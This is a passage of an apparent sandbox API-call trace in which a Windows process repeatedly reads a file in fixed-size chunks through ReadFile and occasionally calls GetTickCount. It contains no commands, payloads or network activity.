lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.659] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.662] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.662] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.662] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.662] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.662] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.662] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.662] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.662] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.662] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.662] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.662] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.662] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.662] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.662] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.662] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.662] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.664] GetTickCount () returned 0x1d5e7b9 [0258.664] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.664] GetTickCount () returned 0x1d5e7b9 [0258.664] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.664] GetTickCount () returned 0x1d5e7b9 [0258.664] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.665] GetTickCount () returned 0x1d5e7b9 [0258.665] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.665] GetTickCount () returned 0x1d5e7b9 [0258.665] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.665] GetTickCount () returned 0x1d5e7b9 [0258.666] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.666] GetTickCount () returned 0x1d5e7b9 [0258.666] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.666] GetTickCount () returned 0x1d5e7b9 [0258.666] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.666] GetTickCount () returned 0x1d5e7b9 [0258.667] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.667] GetTickCount () returned 0x1d5e7b9 [0258.667] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.667] GetTickCount () returned 0x1d5e7b9 [0258.667] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.667] GetTickCount () returned 0x1d5e7b9 [0258.667] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.668] GetTickCount () returned 0x1d5e7b9 [0258.668] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.668] GetTickCount () returned 0x1d5e7b9 [0258.668] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.669] GetTickCount () returned 0x1d5e7b9 [0258.669] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, 